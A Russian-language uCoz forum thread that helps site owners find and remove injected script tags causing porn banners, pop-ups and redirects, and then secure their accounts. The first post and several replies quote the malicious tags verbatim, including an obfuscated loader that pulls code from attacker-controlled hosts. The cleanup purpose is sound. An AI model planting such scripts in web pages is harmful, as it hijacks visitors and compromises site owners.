Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс) |
| Если на вашем сайте появились порнобаннеры |
 Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов: Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script> <script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script> <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script> <script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script> <script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script> <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script> Актуальные на данный момент и самые распространенные эти скрипты Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script> Код <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> Код <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> Код <script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script> Код <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script> Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script> Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script> Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script>  Как удалить: 1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта. Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта) 2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме 3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1 4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции: 1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль 2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу 3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально 5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль! 6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом 7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1  Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем |
|
Natali_SPb, что касается сообщения //forum.ucoz.ru/forum/45-57475-1145710-16-1391425764 то это у вас на сайте что у вас в подписи chin-crest-dog.ucoz.ru.
На этом сайте scalare-spb.com удаляем: Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script> Код <script type="text/javascript" src="http://jk.revolvermaps.com/2/0.js?i=atwb2m10csz&d=3&p=0&b=0&w=293&g=2&f=arial&fs=12&r=0&c0=2b2b2b&c1=feb323&c2=ffffff&ic0=0&ic1=0" async="async"></script> После чистке обязательно не забудьте сменить все пороли инструкция здесь //forum.ucoz.ru/forum/45-52299-1 |
|
Natali_SPb, Странно .. в исходном шаблон маленький ... содержание шапки попробуйте обнулить так же. Пробуйте с другим обозревателем ...
|
|
http://ice-moto.ru/
Несколько дней назад не получилось войти в меню "магазин". Вместо меню появляется ссылка на сайт www.quelle.ru Сайт заблокирован на брандмауре, но в меню так и не могу попасть  Да и порнобанеры уже замучали... Помогите пожалуйста! |
|
Smith2007, вы уже очищали сайт? какой у вас браузер и есть ли проблема в остальных
|
|
Я не очень понимаю как очистить сайт. Использую gogle chrome и firefox
ps. Вообще беда... даже в сообщении на этом форуме слово "магазин" превращается в гиперссылку. Что же это такое? Стоит Антивирус Касперского. Сообщение отредактировал Smith2007 - Понедельник, 03 Фев 2014, 19:17:28
|
|
сondor, Да я знаю что искать и как это удаляется... я технически не могу это сделать!!! Система ставит ограничение по количеству знаков в шаблоне... а на самом деле там их уже "кот наплакал". Или это суммарное ограничение по общему количеству знаков на шаблоны всех страниц?
Но по-любому эти шаблоны в полном объёме знаков были установлены давно и работают не один месяц. Именно сейчас, при корректировке на удаление чужого скрипта стало появляться такое сообщение об ограничении... За несколько лет пользования системой ничего подобного не было. Miss_Esq, Если было бы не странно... я б с такой настойчивостью не отписывалась. ))) Странно, но не смешно, однако... Попробую в другом браузере .  |
|
Smith2007, оставьте слово магазин чтобы было видно ссылку. а вам надо подлечить компьютер
|
|
Natali_SPb, напишите в тех.поддержку из панели управления. можно в бесплатную. вы быструю замену пробовали?
|
|
Нет, как-то побаиваюсь я быстрой замены. Всегда правила вручную. Ну сейчас ещё попробую в другом браузере и потом уж пойду "плакаться" в техподдержку.
Ещё вот что... никогда не делала резервную копию, но не так давно решила, что много уже чего полезного накопилось и пора всё-таки сделать. Может быть эта копия удвоила коды шаблонов и они стали "зашкаливать" за норму? Но вроде было сообщение, что шаблоны не сохраняются... |
|
Natali_SPb, сделайте бекап шаблонов и пробуйте через быструю замену.
панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script> поле на что заменить оставляем пустым и производим замену во всех модулях дальше в поле что заменить вставляем скрипт Код <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script> после очистки читаем как сменить пароль uid профиля //forum.ucoz.ru/forum/45-52299-1 так же читать первое сообщение данной темы. и в следующий раз делаем сразу как вам сказали и не устраиваем самодеятельность |
|
Smith2007, лечим компьютер
|
|
webanet, Спасибо, но у меня все шаблоны индивидуальны, бекап не годится. Правда я не проверяла, что там сохраняется, но точно видела сообщение, что шаблоны в копию не идут.
С Мозиллы справилась вручную. ТТТ, расклинило.  PS. А чем, собственно, быстрая замена отличается от ручной правки... ну кроме быстроты и надежды на точность? |
|
Natali_SPb, в бекап шаблонов входят только шаблоны и все равно на степень их индивидуальности
Цитата С Мозиллы справилась вручную. |
|
Хорошо. Спасибо.
Добавлено (03 Фев 2014, 22:06:31) --------------------------------------------- Ещё раз пересмотрела все страницы... но ничего не нашла. Поскольку вручную уже снесла и скопировать неокуда, сейчас "от греха подальше" повторно сделаю "быстрой заменой" по кодам скриптов, которые выложены в этой теме . Но очень бы хотелось узнать... а где можно увидеть севшие скрипты если в кодах шаблонов их не видно? Добавлено (03 Фев 2014, 22:07:56) --------------------------------------------- И да... на всякий случай - правим не тот сайт, который в подписи. Может вы не туда посмотрели? Коды скриптов из вашего сообщения это аккурат "пришельцы" с сайта в подписи. Адрес сайта, про который речь был в сообщении просто ссылкой. scalare-spb.com PS. Не "докапываюсь"... просто хочу уяснить, вдруг я действительно чего-то не поняла. И ещё раз спасибо за терпеливость, просто хочу разобраться. Сейчас коды скриптов видны ... или всё-таки нет.Сообщение отредактировал Natali_SPb - Понедельник, 03 Фев 2014, 22:14:04
|
| |||